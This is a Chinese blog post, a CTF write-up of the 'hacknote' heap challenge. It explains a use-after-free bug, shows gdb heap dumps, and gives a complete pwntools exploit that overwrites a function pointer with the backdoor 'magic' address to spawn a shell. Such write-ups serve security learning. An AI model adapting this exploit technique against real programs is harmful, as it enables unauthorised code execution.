pwn刷题num44----fast fit and UAF

已于 2022-05-03 13:24:03 修改
阅读量856 收藏 2
点赞数
分类专栏: pwn CTF 堆利用 文章标签: 安全 c语言 linux 网络安全 python
于 2022-05-03 13:15:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124553067
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
堆利用
18 篇文章 1 订阅
订阅专栏

题目链接–本地程序

fast fit思想

如果一个chunk是空闲的并且足够大(大于用户申请的chunk大小),那么申请chunk时,就会选择这个空闲的chunk
在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

32位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

运行一下
在这里插入图片描述
四种选择,添加一个note,删除一个note,输出一个note,退出程序
ida一下
主函数: 调用四个子函数,在这里插入图片描述
menu函数:菜单栏
在这里插入图片描述
add_note();函数,首先限制了可以添加的note的数量,count不能大于5,添加note时,先是申请了0x8字节(mem大小为0x8字节,实际chunk大小为0x10字节)的内存(记为chunk1),之后又申请size(我们输入的大小)的内存(记为chunk2),然后chunk1指向chunk2,所以添加一个note,需要申请两个chunk

在这里插入图片描述
注意一下这里

*notelist[i] = print_note_content;

在这里插入图片描述
这里把一个puts函数地址赋给我们申请的第一个chunk(*notelist[i])

del_note();函数。首先判断输入的要删除的序号是否在[0,4],之后free掉note(申请的两个chunk),
但这里注意free掉之后未把指针置空,存在uaf漏洞
在这里插入图片描述
print_note();

在这里插入图片描述
注意一下这里,前半部分(*notelist[v2])是我们在add函数里的puts函数,后半部分(notelist[v2]);是puts函数的参数,把note的内容dayinchulai

(*notelist[v2])(notelist[v2]);

寻找一下有没有后门函数
在这里插入图片描述
在这里插入图片描述

思路

利用free后指针未置空,先申请两个相同大小的note,产生4个chunk,之后再全释放掉,然后再申请一个小于前两个chunk大小的note,这时把后门函数地址写入chunk中,覆盖掉puts函数的地址,再次调用 print_note();程序直接调用后门函数,获得shell
可以用gdb看一下

exp

from pwn import *
context(os='linux',endian='little',log_level='debug',arch='i386')
context.terminal = ["gnome-terminal", "-x", "sh", "-c"]
sh = process("./hacknote")
elf = ELF("./hacknote")
 
def dbg():
    gdb.attach(sh)
    pause()

def add(size,content='a'):
    sh.sendlineafter("Your choice :",'1')
    sh.sendlineafter("Note size :",str(size))
    sh.sendlineafter("Content :",content)

def dele(index):
    sh.sendlineafter("Your choice :",'2')
    sh.sendlineafter("Index :",str(index))

def show(index):
    sh.sendlineafter("Your choice :",'3')
    sh.sendlineafter("Index :",str(index))

def exits():
    sh.sendlineafter("Your choice :",'4')

magic = p32(elf.sym['magic'])
add(0x10)   #申请两个0x10(mem大小)字节大小的chunk(实际为0x18字节大小)
add(0x10)

dbg()		#调试第一个断点

dele(0)   #删除两个note
dele(1)

dbg()		#调试第二个断点

add(0x8,magic)  #首先申请一个0x10大小的chunk存放puts函数地址和context(输入的note内容)地址,
				#因为我们最后释放的第1个note,所以再次申请chunk时会申请到第1个note的第一个chunk,
				#而我们申请的申请一个0x8(mem大小)字节大小的chunk(实际为0x10字节大小),
				#大小与第0个note的第一个chunk大小一样,会把这个chunk申请出来,
				#而我们写入magic地址,就把puts函数地址覆盖为magic地址

dbg()    #调试第三个断点


show(0)		#调用(*notelist[v2])(notelist[v2]);,此时就是调用magic函数,获得shell
sh.interactive()

运行
在这里插入图片描述
在这里插入图片描述

可以看到程序运行到第一个断点处,发现程序申请了四个chunk,两个一组,一个chunk存puts函数地址(0x080485fb)和下一个chunk地址(0x08aad018),另一个chunk存放输入的note的内容

0x8aad000:	0x00000000	0x00000011	0x080485fb	0x08aad018#0号第一个chunk
0x8aad010:	0x00000000	0x00000019	0x00000a61	0x00000000
0x8aad020:	0x00000000	0x00000000	 #0号第二个chunk   0x00000000	0x00000011
0x8aad030:	0x080485fb	0x08aad040	#1号第一个chunk 0x00000000	0x00000019
0x8aad040:	0x00000a61	0x00000000	0x00000000	0x00000000 #0号第二个chunk

接着运行在这里插入图片描述
可以看到所有chunk中的puts函数地址都被free,但是指针未置空,使第一个chunk还是指向第二个chunk
接着运行
在这里插入图片描述
0号note的第一个chunk的puts函数处已经被我们覆盖为magic函数地址(0x08048945)
接着运行获得shell

在这里插入图片描述
去掉断点调试后的exp

from pwn import *
context(os='linux',endian='little',log_level='debug',arch='i386')
context.terminal = ["gnome-terminal", "-x", "sh", "-c"]
sh = process("./hacknote")
elf = ELF("./hacknote")
def dbg():
    gdb.attach(sh)
    pause()
def add(size,content='a'):
    sh.sendlineafter("Your choice :",'1')
    sh.sendlineafter("Note size :",str(size))
    sh.sendlineafter("Content :",content)
def dele(index):
    sh.sendlineafter("Your choice :",'2')
    sh.sendlineafter("Index :",str(index))
def show(index):
    sh.sendlineafter("Your choice :",'3')
    sh.sendlineafter("Index :",str(index))
def exits():
    sh.sendlineafter("Your choice :",'4')
magic = p32(elf.sym['magic'])
add(0x10)
add(0x10)
dele(0)
dele(1)
add(0x8,magic)
show(0)
sh.interactive()
tbsqigongzi
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN uaf [pwnable.kr]CTF writeup题解系列13
重新启程
01-02 728
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 题目都已经介绍了这是一道Use After Free的题目,那我们就不用多想了,先看看题目主要内容 root@mypwn:/ctf/work/pwnable.kr# ssh uaf@pwnable.kr -p2222 uaf@pwnable.kr's password: ____ __...
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4322
BUUCTF刷题记录
CTF pwn普通UAF题目模板
半岛铁盒的博客
06-15 522
from pwn import * context(log_level=‘debug’) elf=ELF(’./) r=remote("","") #r=process(’./’) def create(size,content): r.sendlineafter("Your choice: ",‘1’) r.sendlineafter("Please input size: ",str(size)) r.sendafter("Please input content: ",content) def del
linux_pwn(1)--uaf
azraelxuemo的博客
03-04 1194
文章目录What is uafpwn题例题add函数show函数delete函数开始做题准备框架调试attackexp总结 What is uaf use after free 一般可能会有以下的场景 ptr=malloc(0x10) free(ptr) ptr-> 可能写代码不会出现这样的明显错误,但如果多文件呢?可能你这个地方释放了,其他地方还存在引用 所以项目中记住,free之后立刻ptr=NULL pwn题 在ctf里面,一般uaf出题模式就是 在bss开辟了区域,保存了每个heap的地址,
PWN · UAF】[NISACTF 2022]UAF
Mr_Fmnwon的博客
07-22 965
作为本萌新做的第一道堆题,接触到新的领域,总是又能够学到很多东西。本题用到了堆漏洞UAF:use after free。UAF的第一题,Heap的第一题。heap一直都是pwn里的大头,好好学!加油!
plaidctf-2016 Pwn试题小结
weixin_30721899的博客
11-21 305
回顾了一下今年plaidctf Pwn部分的题目,感觉还是蛮有意思的,值得研究一下。 1.unix_time_formatter-76 最简单的一道题,考点是UAF。说是UAF但是其实根本就不算是真正的UAF利用,无非就是对释放的内存块进行同大小的占位。因为程序中会把内存块的内容作为system函数的参数,所以只要重新占位并写入/bin/sh就可以了,这道题还是相当简单的。 2.butter...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 680
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2275
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
【盖世汽车-注册安全分析报告】
09-02 1352
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
网络安全宗旨和目标
网络研究观
09-02 672
网络安全涉及网络和相关数据及信息的保护与保障。它已从物理技术发展到防病毒和反网络钓鱼平台等软件方法。
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
文件数据安全交换
09-06 662
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
架构设计(13)安全架构设计理论
追赶时代的博客
09-01 1627
信息安全的架构设计,比如网络安全设计,数据库安全设计
网络安全售前入门09安全服务——安全加固服务
打工人
09-02 1285
安全加固服务是参照风险评估、等保测评、安全检查等工作的结果,基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践,为客户提供完善的安全加固方案,并在客户侧反馈完成加固后,提供二次评估服务,从而帮助客户达到修补信息系统脆弱性,提高系统安全性,满足相关政策法规的目的。
剖析Cookie的工作原理及其安全风险
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-06 793
Cookie,也称为HTTP cookie、web cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备网页的小型数据片段。它允许Web服务器跟踪用户的浏览历史并响应之前披露的偏好。可以增强用户体验,并基于过去的行为启用个性化内容。Cookie通常以键值对的形式存储在用户的硬盘上,是一个二进制的Sqlite文件,Windows系统中Chrome浏览器的Cookie默认位置一般为。Cookie有多种类型,包括会话cookie和持久cookie。
一次性解决 | 网站被提示“不安全
liushuai66888的博客
09-06 255
部署SSL证书:如果网站尚未部署SSL证书,需要购买或获取一个由权威证书颁发机构(CA)签发的SSL证书,并安装在服务器上。安装证书后,网站就是经过第三方CA验证过的,浏览器就会信任这类网站,也就不会在提示“不安全”。通过以上步骤,可以一次性解决网站被提示“不安全”的问题,提升网站的安全性,保护用户数据,并增强网站的品牌形象和用户信任度。如果自己不熟悉SSL证书的安装和配置,或者遇到难以解决的问题,建议联系专业的技术支持人员或网络安全专家来帮助解决。检查证书链:确保证书链完整,没有缺少必要的中间证书。
网络安全应急响应技术原理与应用
weixin_49171105的博客
09-06 183
概念为应对网络安全事件,相关人员或组织机构对网络安全事件进行监测、预警、分析、响应和恢复等工作。
攻防世界pwn-forgot
08-10
- *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值